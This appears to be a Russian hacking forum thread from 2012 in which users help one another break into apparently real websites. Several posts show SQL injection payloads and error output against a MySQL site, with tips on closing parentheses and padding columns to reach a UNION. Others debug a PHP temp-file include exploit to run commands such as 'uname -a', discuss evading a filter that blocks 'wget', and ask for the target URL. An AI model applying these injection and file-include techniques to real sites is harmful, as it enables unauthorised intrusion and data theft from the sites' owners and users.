Старый 08.08.2012, 20:35   #2261
Qwazar
 
Регистрация: 09.07.2010
Сообщений: 376
Репутация: 154
По умолчанию

Цитата:
Сообщение от Isis Посмотреть сообщение
Пытаюсь провести SQL inj.
fuckid=1)-- выдает syntax error
fuckid=1))-- выдает неизвестная ошибка
Саму ошибку не выводит.
Дальше не проходит ничего - постоянно неизвестная ошибка.
Что в тексте ошибки? Уверен что имеешь дело с SQL?
__________________
Мой блог: http://qwazar.ru/.
Qwazar вне форума   Ответить с цитированием
Старый 08.08.2012, 21:07   #2262
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Цитата:
Сообщение от Isis Посмотреть сообщение
Текста ошибки нет. DB error: syntax error.
Примерно так пишет.
Наверно Bitrix. Сайт выложи. (Так si[bla-bla]te[bla-bla]com).
Ereeee вне форума   Ответить с цитированием
Старый 08.08.2012, 23:38   #2263
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

Цитата:
Сообщение от Isis Посмотреть сообщение
DB error: syntax error.
Примерно так пишет.
syntax error - это 90% sqlite

Последний раз редактировалось Andrey1800; 08.08.2012 в 23:47..
Andrey1800 вне форума   Ответить с цитированием
Старый 09.08.2012, 01:54   #2264
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от Andrey1800 Посмотреть сообщение
syntax error - это 90% sqlite
Проверить скулайт или нет можно по комментариям - в SQLite не работает строчный коммент решеткой.
http://www.sqlite.org/lang_comment.html
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 09.08.2012, 13:31   #2265
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

По поводу фильтрации так и не разобрался, какой-то анализатор POST-данных, не проходят многие запросы с кавычками, пробелами. В общем, base64 + запуск сриптов из консоли решает.

UPD: вот теперь весело, в POST не пропускаются скобки, некоторые выражения с кавычками, любые запросы со словом wget. Файлы, кстати, заливаются. Кто-нибудь узнает ошибку?

И да, спасибо тем, кто помог с нодами - интересный опыт.

Последний раз редактировалось Untitled; 09.08.2012 в 15:40..
Untitled вне форума   Ответить с цитированием
Старый 09.08.2012, 15:47   #2266
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от Hok1do Посмотреть сообщение
tipsy, да ты прав на счет не создаваемого глоб. массива.
А теперь вот такая проблемка:
Line 81:
PHP код:
if ($line =~ m#tmp_name].+(/tmp/php.+)$#) 
P.S. Что за файл он выдает для инклюда - /tmp/name? В phpcode стоит uname -a, шелл я не где не записывал, а он все равно что то выдает... Pashkela?

Цитата:
/tmp/name
как видно по скрину - подключает временный файл, который в /tmp

Цитата:
В phpcode стоит uname -a, шелл я не где не записывал, а он все равно что то выдает...
сам понял, что написал?

внимательно смотри phpinfo, скорее всего system в disabled functions, и еще раз - сначала пробуй простые вещи, типо echo 12345;

также можно поиграть с

my $rcvbuf = 1024;

в оригинальном коде от tipsy там было 512
Pashkela вне форума   Ответить с цитированием
Старый 09.08.2012, 15:59   #2267
pres
 
Регистрация: 09.07.2010
Сообщений: 19
Репутация: 0
По умолчанию

есть скуль, при подстановке кавычки

Цитата:
date=2012-08-11'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 't', '', '', '1111', 'EXP', 'DET')' at line 1


Пробую
Цитата:
2012-08-11'+order+by+1+--+
Выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ', 't', '', '', '1111', 'EXP', 'DET')' at line 1

Видно, что уязвимая переменная в середине, запроса, поэтому просто так незаюнионить, значит нужно закрывать скобки.


Делаю так.

Цитата:
date=2012-08-11')+--+
Выдает

Incorrect number of arguments for PROCEDURE %TABLENAME%; expected 8, got 2

Ага, там процедуры и всего 8 колонок, значит дописываем еще 6

Цитата:
date=2012-08-11',1,1,1,1,1,1)+--+
Запрос срабатывает, но выдает ноль записей(скорей всего на данную дату записей просто нет)


Значит нужно каким-то образом прицепить юнион, но как это сделать?

Когда добавляю что-то к запросу - фейл.

Цитата:
date=2012-08-11',1,1,1,1,1,1)+and+1=1+--+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and 1=1 -- ', 't', '', '', '1111', 'EXP', 'DET')' at line 1


Что посоветуете?
pres вне форума   Ответить с цитированием
Старый 09.08.2012, 16:16   #2268
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Уверен, что SELECT-запрос?
Untitled вне форума   Ответить с цитированием
Старый 09.08.2012, 16:29   #2269
pres
 
Регистрация: 09.07.2010
Сообщений: 19
Репутация: 0
По умолчанию

Цитата:
Сообщение от Untitled Посмотреть сообщение
Уверен, что SELECT-запрос?
Не уверен, но думаю, что все-таки там селект
pres вне форума   Ответить с цитированием
Старый 09.08.2012, 16:36   #2270
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

ссылку нано
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot